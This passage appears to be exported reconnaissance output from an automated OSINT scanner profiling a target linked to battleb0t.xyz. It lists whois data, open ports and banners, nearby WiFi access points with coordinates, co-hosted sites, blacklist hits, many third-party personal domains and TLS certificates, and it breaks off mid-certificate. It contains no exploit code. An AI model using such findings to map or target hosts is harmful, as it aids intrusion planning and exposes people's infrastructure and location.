"short_description": "Boxel 3D is the 3rd release of your favorite box jumping game made by the developers of Boxel Rebound.", "icon": "https://lh3.googleusercontent.com/wJh9K6xTW1upb8nCKtceJ62mE4BWbS7o4RiQpNnxoATQ8sn5w6RIYK9e5B6vPBp8Ve-rw9ZC9s-fTn7aiiH211Xd=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 1291, "name": "Boxel 3D"}, "cogmkaeijeflocngklepoknelfjpdjng": {"rating": 4.026706, "users": 100000, "platform": "", "short_description": "Powerful Video Downloader. 
Downloads most popular media formats like flash, videos, audios.", "icon": "https://lh3.googleusercontent.com/VlYizxdn50R6ZbmamuMJtMI0fLKaA1MQ9oZfGx3_Ewx-vHafh3aU3kcioZev8TGkc1bhrdEpYg9QRSlV2ip95SrWKw=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 337, "name": "Universal Video Downloader"}, "pjafcgbpdclmdeiipolenjgkikeldljl": {"rating": 4.6231885, "users": 100000, "platform": "", "short_description": "Play the piano in your browser", "icon": "https://lh3.googleusercontent.com/Qr_GTzNHNuRvSIDBRrVhDo_oe1X8lMQ4EeUvbHpXMn82tUSBxqqBrNTll4RwlrIAT8eT79cMTqE4XwkmlpsQXTeA=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 69, "name": "Chrome Piano"}, "dlnkkghpoaboifilieokcpoclbhpoclo": {"rating": 4.610895, "users": 400000, "platform": "", "short_description": "The classic Flappy Bird game offline version on your Google Chrome! Free online Flappy Bird plat on Desktop. Flappy for Chrome.", "icon": "https://lh3.googleusercontent.com/NJeftxVVijTjJAjU513yZrpTnqhUaifchPG7ueRV4tbYdvyhLFzaxrv78efd89uuDttH5JGOEYGzyIWwmUpQXfwXKw=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 257, "name": "Flappy Bird Offline. 
Desktop Version"}, "gokcmhknbfbkchaljcbjloaebnoblcnd": {"rating": 4.47541, "users": 100000, "platform": "", "short_description": "Welcome to Arcade Classics - a free browser extension with 9 games to play!", "icon": "https://lh3.googleusercontent.com/INSecUCn41xlC2ZJ-EtqFbnHRT6NQ7rwnT-A3AHFZBqvHUO5znb9qBco8HWaXTsM09TceC152h7LIesE_ncO3GktDw=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 61, "name": "Arcade Classics"}, "emeokgokialpjadjaoeiplmnkjoaegng": {"rating": 3.3394256, "users": 500000, "platform": "", "short_description": "Draw shapes, lines, and add text to live web pages and take screenshot.", "icon": "https://lh3.googleusercontent.com/Wafwq7jbZDxfLNCG587_eBMy91NkmSP2JFA3b4hWobkUAplS41SaW08gHYd8vcamJ1EPG5gQMPoQ_VDoVTNT9wH-KQ=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 766, "name": "Web Paint"}, "goiejopegncpjmocklmfiipofdbkhpic": {"rating": 4.5925927, "users": 100000, "platform": "", "short_description": "Doodle Jump! Jump and break your records!", "icon": "https://lh3.googleusercontent.com/sdyc5k0236GAl3UATyeaXTUVV7KzolMDZCdMo2ndFcYeMMX0hYvUNkCAf2hCBvnIZrd4NIjVJ41Huds2XMXL3qgo=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 27, "name": "Doodle Jump Ninja"}, "fadndhdgpmmaapbmfcknlfgcflmmmieb": {"rating": 4.466354, "users": 1000000, "platform": "", "short_description": "Use a variety of unique faces on Twitch!", "icon": "https://lh3.googleusercontent.com/qeMTob_QmnY3Mt8c-PnUxLs8nA82SW2VNylqMQ70aSRfpHCDISNXQI_4CIaW9N-kFyfhiAGYZ4Gy2zU4EaD5QxEEL-Y=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 639, "name": "FrankerFaceZ"}, "bmjmipppabdlpjccanalncobmbacckjn": {"rating": 4.889806, "users": 200000, "platform": "", "short_description": "Cool, cute and funny cursors for Chrome\u2122, choose from hundreds of options.", "icon": "https://lh3.googleusercontent.com/cFDN-1ehvX3Ru1s02Aq68gnGJB2PyGa3Z1OfGXK7gWrvPYJZy7q68KxLX4Y5peQfd6aVYzNab2Kp7ZIxcOy1N_mcO4E=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 2060, "name": "Cursor style - custom cursor for your 
browser"}, "ogdlpmhglpejoiomcodnpjnfgcpmgale": {"rating": 4.716016, "users": 6000000, "platform": "", "short_description": "Fun custom cursors for Chrome\u2122. Use a large collection of free cursors or upload your own.", "icon": "https://lh3.googleusercontent.com/H2MMZR0mOR25jQf_4GdtDTufefua3igDkUq9TXdzfdqHXxkp9zfuVp3gSqAKRWGG2urjM0PlMIdLuZWcWRAtlUvZ=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 42439, "name": "Custom | ayhu.xyz |
| 2023-05-12 02:59:45 | Affiliate - Domain Whois | No | Whois | 2 | 0 | 5 | 0 | None | Domain Name: GOOGLEUSERCONTENT.COM
Registry Domain ID: 1528918319_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.markmonitor.com
Registrar URL: http://www.markmonitor.com
Updated Date: 2022-10-16T09:27:01Z
Creation Date: 2008-11-17T15:58:29Z
Registry Expiry Date: 2023-11-17T15:58:29Z
Registrar: MarkMonitor Inc.
Registrar IANA ID: 292
Registrar Abuse Contact Email: abusecomplaints@markmonitor.com
Registrar Abuse Contact Phone: +1.2086851750
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Domain Status: serverDeleteProhibited https://icann.org/epp#serverDeleteProhibited
Domain Status: serverTransferProhibited https://icann.org/epp#serverTransferProhibited
Domain Status: serverUpdateProhibited https://icann.org/epp#serverUpdateProhibited
Name Server: NS1.GOOGLE.COM
Name Server: NS2.GOOGLE.COM
Name Server: NS3.GOOGLE.COM
Name Server: NS4.GOOGLE.COM
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2023-05-12T02:59:31Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar. Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.
TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability. VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.
The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
| googleusercontent.com |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | 55 2nd PMO (Net ID: 00:01:21:10:61:00) | 37.780462,-122.390564 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | BodyBuilding.com (Category: health)
http://bodyspace.bodybuilding.com/login/ | login |
| 2023-05-12 02:54:03 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 172.67.135.9:2095 | 172.67.135.9 |
| 2023-05-12 03:00:53 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 0000rgb124.github.io | 185.199.111.153 |
| 2023-05-12 02:54:34 | Open TCP Port Banner | No | Censys | 0 | 0 | 3 | 0 | None | HTTP/1.1 403 Forbidden
Date: <REDACTED>
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Frame-Options: SAMEORIGIN
Referrer-Policy: same-origin
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 7c5c8cb9da901236-ORD
Content-Encoding: gzip
| 104.21.71.14 |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | default (Net ID: 00:01:24:F2:E0:26) | 37.7813933,-122.3918002 |
| 2023-05-12 03:10:06 | Malicious IP Address | Yes | VoIPBL OpenPBX IPs | 0 | 1 | 2 | 0 | None | VOIPBL Publicly Accessible PBX List [185.199.110.153]
http://www.voipbl.org/update | 185.199.110.153 |
| 2023-05-12 03:03:30 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 0047ol.github.io |
| 2023-05-12 02:53:49 | Raw Data from RIRs | No | Censys | 0 | 0 | 2 | 0 | None | {"last_updated_at": "2023-05-11T17:57:31.398Z", "ip": "2606:50c0:8000::153", "location_updated_at": "2023-05-08T16:34:05.180048Z", "autonomous_system_updated_at": "2023-05-08T16:34:05.180102Z", "location": {"province": "California", "city": "San Francisco", "country": "United States", "coordinates": {"latitude": 37.7621, "longitude": -122.3971}, "postal_code": "94107", "country_code": "US", "timezone": "America/Los_Angeles", "continent": "North America"}, "dns": {"records": {"www.pixeli.dev": {"record_type": "CNAME", "resolved_at": "2023-03-13T23:50:00.966261596Z"}, "www.willbishop.dev": {"record_type": "CNAME", "resolved_at": "2023-03-06T20:23:13.520153960Z"}, "www.spncr.dev": {"record_type": "CNAME", "resolved_at": "2023-03-22T19:22:10.270076260Z"}, "www.rohanseth.dev": {"record_type": "CNAME", "resolved_at": "2023-02-22T00:00:27.264834898Z"}, "www.asiavalentine.dev": {"record_type": "CNAME", "resolved_at": "2023-03-05T15:52:15.471978167Z"}, "catclicker.zaklaughton.dev": {"record_type": "CNAME", "resolved_at": "2023-03-22T17:42:34.665120760Z"}, "www.omkardhande.dev": {"record_type": "CNAME", "resolved_at": "2023-03-22T07:55:27.721595395Z"}, "www.montferret.dev": {"record_type": "CNAME", "resolved_at": "2023-03-20T01:17:26.803641174Z"}, "hkatz.dev": {"record_type": "AAAA", "resolved_at": "2023-03-22T11:14:05.854477536Z"}, "myreads.zaklaughton.dev": {"record_type": "CNAME", "resolved_at": "2023-02-26T21:11:31.059545269Z"}, "mint.gaiaprotocol.com": {"record_type": "CNAME", "resolved_at": "2023-05-07T14:38:55.332333650Z"}, "web-dev.docs.inditex.dev": {"record_type": "CNAME", "resolved_at": "2023-03-04T15:55:36.047967881Z"}, "greshnikov.net": {"record_type": "AAAA", "resolved_at": "2023-04-19T21:42:27.985888825Z"}, "svelte.calories.claas.dev": {"record_type": "CNAME", "resolved_at": "2023-04-04T16:51:51.844422366Z"}, "namco.dev": {"record_type": "AAAA", "resolved_at": 
"2023-01-19T14:14:45.143590011Z"}, "www.tcamba.dev": {"record_type": "CNAME", "resolved_at": "2023-03-23T17:56:56.616082497Z"}, "thaecohvah.syntactic-sugar.design": {"record_type": "CNAME", "resolved_at": "2023-04-23T09:37:19.694810939Z"}, "mst.biuxbiu.design": {"record_type": "CNAME", "resolved_at": "2023-04-28T17:39:08.436586135Z"}, "kbau.dev": {"record_type": "AAAA", "resolved_at": "2023-02-27T15:42:55.285099290Z"}, "www.grantanna.dev": {"record_type": "CNAME", "resolved_at": "2023-02-27T15:42:47.651834600Z"}, "www.kazusato.dev": {"record_type": "CNAME", "resolved_at": "2023-03-05T15:53:18.300056949Z"}, "www.olmedilla.com": {"record_type": "CNAME", "resolved_at": "2023-03-18T14:54:03.698785602Z"}, "cuillere.dev": {"record_type": "AAAA", "resolved_at": "2023-04-24T16:59:59.805050461Z"}, "www.srinivasreddy.dev": {"record_type": "CNAME", "resolved_at": "2023-03-02T15:51:53.148982927Z"}, "www.cliu.dev": {"record_type": "CNAME", "resolved_at": "2023-03-24T23:25:10.893500128Z"}, "www.notsostandardmodel.com": {"record_type": "CNAME", "resolved_at": "2023-03-01T14:47:59.242829135Z"}, "kaiseki.coderfin.dev": {"record_type": "CNAME", "resolved_at": "2023-03-13T16:02:42.934790176Z"}, "www.robisonweb.dev": {"record_type": "CNAME", "resolved_at": "2023-02-28T15:51:22.213479983Z"}, "trubbylove.laury.dev": {"record_type": "CNAME", "resolved_at": "2023-03-22T00:18:26.457996047Z"}, "blog.hiluohao.com": {"record_type": "CNAME", "resolved_at": "2023-03-28T14:57:36.831718722Z"}, "www.yusry.de": {"record_type": "CNAME", "resolved_at": "2023-04-23T16:48:40.403075909Z"}, "gh.grollif.com": {"record_type": "CNAME", "resolved_at": "2023-03-29T15:27:50.311379943Z"}, "data-observability-tag.docs.inditex.dev": {"record_type": "CNAME", "resolved_at": "2023-03-19T15:35:12.630016737Z"}, "www.ttlresearch.com": {"record_type": "CNAME", "resolved_at": "2023-04-14T20:20:06.761328463Z"}, "siuts.proekspert.ee": {"record_type": "CNAME", "resolved_at": "2023-02-08T17:06:34.527975069Z"}, 
"www.dannytran.dev": {"record_type": "CNAME", "resolved_at": "2023-03-17T15:48:34.941987381Z"}, "yanshouwang.dev": {"record_type": "AAAA", "resolved_at": "2023-03-21T00:21:54.271513621Z"}, "www.hiennguyen.dev": {"record_type": "CNAME", "resolved_at": "2023-03-07T12:59:42.443779889Z"}, "database.jiny.dev": {"record_type": "CNAME", "resolved_at": "2023-03-21T00:19:55.315272389Z"}, "www.shaneporter.dev": {"record_type": "CNAME", "resolved_at": "2023-03-21T00:20:35.708785655Z"}, "blog.brandonmathis.me": {"record_type": "CNAME", "resolved_at": "2023-03-21T21:08:33.485121539Z"}, "blog.limeira.dev": {"record_type": "CNAME", "resolved_at": "2023-03-02T15:51:35.974650849Z"}, "v1.commandtech.dev": {"record_type": "CNAME", "resolved_at": "2022-10-31T15:01:33.036179596Z"}, "nfshibes.com": {"record_type": "AAAA", "resolved_at": "2023-04-19T17:29:58.637558645Z"}, "help.programm-chest.dev": {"record_type": "CNAME", "resolved_at": "2022-11-30T14:37:46.643013242Z"}, "flagicons.lipis.dev": {"record_type": "CNAME", "resolved_at": "2023-03-19T15:35:16.844777559Z"}, "www.hautetechorientale.com": {"record_type": "CNAME", "resolved_at": "2023-04-14T18:50:32.432484276Z"}, "rvtravel.debiron.com": {"record_type": "CNAME", "resolved_at": "2023-03-22T10:35:02.381212614Z"}, "polothil.github.com": {"record_type": "CNAME", "resolved_at": "2023-03-01T14:13:36.027155340Z"}, "blog2.foxcii.com": {"record_type": "CNAME", "resolved_at": "2023-03-18T21:20:31.600174494Z"}, "www.aashish.dev": {"record_type": "CNAME", "resolved_at": "2023-04-19T19:07:09.565393850Z"}, "q42.github.com": {"record_type": "CNAME", "resolved_at": "2023-03-20T21:14:14.876154310Z"}, "mick.maccallum.dev": {"record_type": "CNAME", "resolved_at": "2023-02-22T16:19:47.687126527Z"}, "www.guziyf.com": {"record_type": "CNAME", "resolved_at": "2023-01-15T05:57:21.072132005Z"}, "www.matthewpereira.com": {"record_type": "CNAME", "resolved_at": "2023-03-25T21:28:16.599843999Z"}, "www.frontendtesting.com": {"record_type": "CNAME", 
"resolved_at": "2023-03-04T14:07:21.806350891Z"}, "new.steli.kiev.ua": {"record_type": "CNAME", "resolved_at": "2023-04-24T22:30:03.738257685Z"}, "weili512.github.io": {"record_type": "AAAA", "resolved_at": "2023-03-02T16:30:29.884086670Z"}, "resume.chann.dev": {"record_type": "CNAME", "resolved_at": "2023-03-20T16:16:20.658403265Z"}, "www.wazted.fr": {"record_type": "CNAME", "resolved_at": "2023-05-11T17:32:27.312675959Z"}, "zdf.zerodarktech.com": {"record_type": "CNAME", "resolved_at": "2023-01-04T12:37:43.534076338Z"}, "www.mtconnectcore.dev": {"record_type": "CNAME", "resolved_at": "2023-03-16T14:59:11.184709249Z"}, "www.mikezalik.com": {"record_type": "CNAME", "resolved_at": "2023-01-30T13:35:57.247139345Z"}, "shortcuts.bludood.com": {"record_type": "CNAME", "resolved_at": "2022-10-27T13:10:37.241256116Z"}, "www.aloha.org.cn": {"record_type": "CNAME", "resolved_at": "2022-12-14T12:40:48.602824216Z"}, "ivanleeswe.github.io": {"record_type": "AAAA", "resolved_at": "2023-03-14T00:28:16.302626796Z"}, "www.williamjang.dev": {"record_type": "CNAME", "resolved_at": "2023-03-11T15:47:39.271340346Z"}, "www.mangato.es": {"record_type": "CNAME", "resolved_at": "2023-04-22T16:31:05.591550189Z"}, "msk.im": {"record_type": "AAAA", "resolved_at": "2023-05-09T17:24:25.369430576Z"}, "stevenbone.dev": {"record_type": "AAAA", "resolved_at": "2023-04-20T02:37:36.462044411Z"}, "www.dwivedula.dev": {"record_type": "CNAME", "resolved_at": "2023-03-07T15:37:48.541873098Z"}, "www.ousmane.dev": {"record_type": "CNAME", "resolved_at": "2023-03-22T15:03:29.723057364Z"}, "www.shira.dev": {"record_type": "CNAME", "resolved_at": "2023-03-22T17:45:59.585738764Z"}, "www.codenotes.dev": {"record_type": "CNAME", "resolved_at": "2023-04-02T01:42:40.361559321Z"}, "www.thyagajan.in": {"record_type": "CNAME", "resolved_at": "2023-02-04T15:11:06.016790048Z"}, "haoyan.vin": {"record_type": "CNAME", "resolved_at": "2023-03-24T21:40:03.224812796Z"}, "www.sangjunchun.com": {"record_type": "CNAME", 
"resolved_at": "2023-05-07T15:42:03.799026511Z"}, "www.lawrencedunbar.dev": {"record_type": "CNAME", "resolved_at": "2023-03-08T15:50:22.533060749Z"}, "www.gilsoffer.com": {"record_type": "CNAME", "resolved_at": "2023-03-18T21:22:12.068548907Z"}, "www.jenniwu.dev": {"record_type": "CNAME", "resolved_at": "2023-04-24T17:00:00.073227865Z"}, "www.coltonfalkner.dev": {"record_type": "CNAME", "resolved_at": "2023-03-22T19:22:40.169282211Z"}, "andressa.dev": {"record_type": "CNAME", "resolved_at": "2023-04-13T16:15:01.948884742Z"}, "www.dangillis.dev": {"record_type": "CNAME", "resolved_at": "2023-03-05T15:53:20.930987816Z"}, "www.jasonscotto.dev": {"record_type": "CNAME", "resolved_at": "2023-03-16T04:01:31.543104004Z"}, "volnt.github.com": {"record_type": "CNAME", "resolved_at": "2023-04-18T12:15:25.538707631Z"}, "www.ologn.dev": {"record_type": "CNAME", "resolved_at": "2023-02-14T15:37:29.279040979Z"}, "www.sreehari.dev": {"record_type": "CNAME", "resolved_at": "2023-03-14T15:27:59.231327405Z"}, "www.jenniferyaya.ca": {"record_type": "CNAME", "resolved_at": "2023-05-11T12:50:41.791793242Z"}, "proofcafe.github.com": {"record_type": "CNAME", "resolved_at": "2023-02-21T14:18:15.798052993Z"}, "mirror.growingio.design": {"record_type": "CNAME", "resolved_at": "2022-12-20T14:28:15.483007528Z"}, "www.framy.dev": {"record_type": "CNAME", "resolved_at": "2023-03-04T15:55:45.611656444Z"}, "www.colorbuilder.dev": {"record_type": "CNAME", "resolved_at": "2023-03-17T15:48:32.011890468Z"}, "www.oscarablinger.dev": {"record_type": "CNAME", "resolved_at": "2023-05-01T09:06:38.146245867Z"}, "abeziou.dev": {"record_type": "AAAA", "resolved_at": "2023-03-27T23:40:41.232028838Z"}, "fosterinfotech.com": {"record_type": "AAAA", "resolved_at": "2023-04-15T14:30:18.377726429Z"}, "www.johndal.com": {"record_type": "CNAME", "resolved_at": "2023-03-18T21:34:43.427896647Z"}, "shop4data-ui.docs.collibra.dev": {"record_type": "CNAME", "resolved_at": "2023-03-22T00:18:31.647476511Z"}, 
"www.codar.dev": {"record_type": "CNAME", "resolved_at": "2023-03-22T07:54:18.450070838Z"}, "www.ky1vstar.dev": {"record_type": "CNAME", "resolved_at": "2023-03-11T15:47:22.392376650Z"}, "portfolio.gchahm.dev": {"record_type": "CNAME", "resolved_at": "2023-01-14T14:40:10.714963428Z"}}, "names": ["www.yusry.de", "database.jiny.dev", "www.sreehari.dev", "www.jenniwu.dev", "abeziou.dev", | 2606:50c0:8000::153 |
| 2023-05-12 03:01:23 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.218): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:46:38 | BGP AS Membership | No | RIPE | 0 | 0 | 3 | 0 | None | 36459 | 185.199.111.0/24 |
| 2023-05-12 03:03:16 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | panel.battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:4a:0e:8c:1b:d3:a5:34:69:b6:32:8e:46:29:d8:95:17:d9
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Nov 17 09:44:04 2022 GMT
Not After : Feb 15 09:44:03 2023 GMT
Subject: CN=panel.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
00:ae:fd:f2:48:0f:df:bc:e1:99:1b:6f:bd:c7:77:
53:7a:c0:8b:77:cd:2c:3c:60:53:e0:e9:b0:a7:7b:
73:98:97:7e:b8:eb:d6:f1:08:7b:2c:70:98:ff:62:
24:3a:e4:75:75:15:64:3c:f3:10:df:1f:74:86:c2:
03:e3:19:f8:ee:1b:1c:a4:33:45:b3:b5:bd:cc:36:
58:4b:c6:53:5a:e5:a0:83:1c:13:b6:0a:f0:09:85:
49:e2:af:1f:59:f3:45:35:c5:76:d8:d7:03:6b:48:
2d:81:71:8d:d8:b6:9f:ca:3d:be:a5:d1:d0:6d:84:
3f:57:a3:f9:3b:33:48:5e:3a:10:1b:9a:8e:0e:52:
e4:41:61:32:48:9e:eb:dd:91:27:08:98:23:0d:d6:
40:40:46:c6:2e:72:9b:5e:7b:a7:ce:14:5c:e3:33:
d1:e0:7f:e9:bf:c8:04:bf:dd:c3:5b:ec:18:53:dc:
e8:49:50:75:f5:f6:57:2f:90:7f:b7:6a:c4:1e:bc:
3e:2d:04:87:d0:de:ec:72:7e:5e:84:cf:77:05:c4:
81:0d:1d:68:c9:a6:7c:75:bd:ed:fa:cd:4e:88:39:
5c:0c:10:a3:f5:6d:4b:7d:20:b4:0a:24:fb:93:43:
e5:9b:70:b2:e4:95:89:06:02:90:7a:2d:6f:c2:fa:
77:78:2c:13:6f:d6:08:02:00:eb:f1:d0:25:de:0b:
0c:36:d6:0b:0b:8d:58:6f:b7:29:51:a7:c3:27:fb:
ab:fa:3f:bd:88:88:4d:63:79:00:4e:5f:ea:ff:bf:
a7:e5:c8:b9:01:b0:11:55:38:c5:2c:12:42:ec:9f:
41:d5:d8:5b:cb:0e:56:2f:f5:0b:5b:b2:1f:2e:4b:
1c:7b:f3:b8:8f:a3:2a:22:10:32:70:e5:ff:92:c9:
9d:cf:f4:1c:87:80:7b:03:c4:11:f8:c8:fe:1d:fd:
d9:21:53:2a:ab:a4:e1:88:2f:4b:5d:2f:ee:62:ac:
58:24:c3:6b:51:75:98:92:28:85:71:19:cf:1f:32:
bf:04:e0:46:cb:6a:6e:1a:53:77:bb:51:7b:25:a8:
3b:79:a4:fe:31:da:29:cb:94:14:d8:b7:bf:23:48:
40:7c:38:77:e2:71:aa:43:c0:dd:58:a7:d1:0f:28:
19:e1:e9:99:2b:f4:ba:45:c8:6a:f8:d6:7a:86:7e:
a9:1e:96:ed:9c:c8:12:b9:05:83:95:70:08:f4:a3:
69:c3:37:93:d6:82:c5:85:91:d6:07:1b:87:31:af:
f4:29:c3:da:2f:cb:d0:72:02:68:65:19:d7:78:65:
82:75:d2:3a:e3:90:30:94:d9:d7:ad:e9:8d:db:16:
21:a3:69
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
40:6C:27:E5:F5:7A:53:84:B0:9C:FE:C0:1C:53:80:B3:F8:A3:C2:C8
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:panel.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
31:e8:ef:7b:dc:32:84:dd:2e:cc:16:1c:67:37:d9:86:76:04:
cf:c1:4a:db:fc:f8:35:75:ae:c3:16:b4:0f:be:85:8b:2e:20:
db:eb:90:53:b8:18:4d:ef:7f:9f:02:58:b1:11:60:70:ce:ed:
48:d1:03:e8:96:d0:08:23:48:86:a6:a1:dd:67:5c:22:34:8f:
7b:e9:55:8c:27:c1:a3:38:4d:9e:0d:fe:62:f2:2a:c2:c8:2a:
7f:a8:e9:c9:39:5d:dd:14:84:0b:ca:c2:43:a5:28:2d:bf:3e:
df:33:fa:93:d0:d2:25:aa:bf:96:26:a0:e2:28:49:c3:01:f6:
1b:1f:83:32:9b:6e:57:55:9b:b2:74:7a:0d:c6:40:a1:6f:35:
c4:08:94:e4:ae:84:9e:57:8b:d7:39:a4:95:6f:4e:9a:ff:c5:
d4:c6:a2:ec:49:72:ad:a2:fe:9d:76:83:15:0f:a5:d6:70:72:
bc:54:bb:e6:d0:4d:78:23:d8:86:e5:91:24:e1:d6:5c:9f:c0:
4f:96:79:66:56:47:4e:a5:83:46:6a:88:fc:1a:f6:c8:24:7e:
cc:fc:53:86:95:72:5f:4e:3c:48:0d:0e:f3:6a:43:f6:6b:fb:
f5:6b:36:26:89:53:4a:22:4b:a7:9e:de:e2:c4:fb:85:8c:ca:
ff:01:95:cd
|
| 2023-05-12 02:44:39 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:03:e6:77:f0:fb:1d:de:0e:93:d2:d9:e5:40:98:fb:b1:42
Signature Algorithm: ecdsa-with-SHA384
Issuer: C=US, O=Let's Encrypt, CN=E1
Validity
Not Before: Nov 17 08:07:50 2022 GMT
Not After : Feb 15 08:07:49 2023 GMT
Subject: CN=*.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: id-ecPublicKey
Public-Key: (256 bit)
pub:
04:b1:ca:c5:7f:45:88:ea:f6:98:9e:7e:93:33:29:
bd:74:fc:48:fe:29:e9:2a:62:8c:97:f1:93:16:6f:
19:da:24:7c:94:17:6e:35:5b:b2:ef:eb:77:ee:6f:
68:a3:10:bb:0d:f6:01:57:78:db:8f:85:23:65:1b:
8d:5a:d8:02:5e
ASN1 OID: prime256v1
NIST CURVE: P-256
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
26:F8:75:40:42:15:34:A1:4E:96:C0:96:27:7F:34:DA:52:69:CF:39
X509v3 Authority Key Identifier:
keyid:5A:F3:ED:2B:FC:36:C2:37:79:B9:52:30:EA:54:6F:CF:55:CB:2E:AC
Authority Information Access:
OCSP - URI:http://e1.o.lencr.org
CA Issuers - URI:http://e1.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:*.battleb0t.xyz, DNS:battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 6F:53:76:AC:31:F0:31:19:D8:99:00:A4:51:15:FF:77:
15:1C:11:D9:02:C1:00:29:06:8D:B2:08:9A:37:D9:13
Timestamp : Nov 17 09:07:51.072 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:20:16:9A:44:87:BF:E8:FB:88:4F:27:C3:23:
D7:41:4A:F8:BC:44:42:20:18:B7:8C:EF:CD:C8:5C:14:
86:9C:04:8F:02:21:00:D8:FC:B1:DA:CE:C1:81:91:75:
82:10:9B:4A:3A:12:1B:FE:70:80:7F:A6:84:E4:C5:04:
58:38:0B:34:F3:1E:73
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : AD:F7:BE:FA:7C:FF:10:C8:8B:9D:3D:9C:1E:3E:18:6A:
B4:67:29:5D:CF:B1:0C:24:CA:85:86:34:EB:DC:82:8A
Timestamp : Nov 17 09:07:51.066 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:20:15:CD:95:9A:3C:F7:20:93:54:3E:08:F7:
6D:D4:73:9D:63:2C:14:38:C7:1C:15:38:7A:3E:1C:B5:
3A:C9:C0:A8:02:21:00:C8:7B:89:3A:AC:D8:F0:69:E9:
DE:74:9E:7E:74:A9:4E:43:C7:89:2C:62:13:65:90:95:
4A:78:C6:0D:71:91:72
Signature Algorithm: ecdsa-with-SHA384
30:65:02:30:19:f9:7b:55:14:7a:4c:2b:b8:a8:55:31:bc:66:
14:95:52:8a:fe:84:4c:61:c2:02:53:4a:80:96:e1:54:a7:b8:
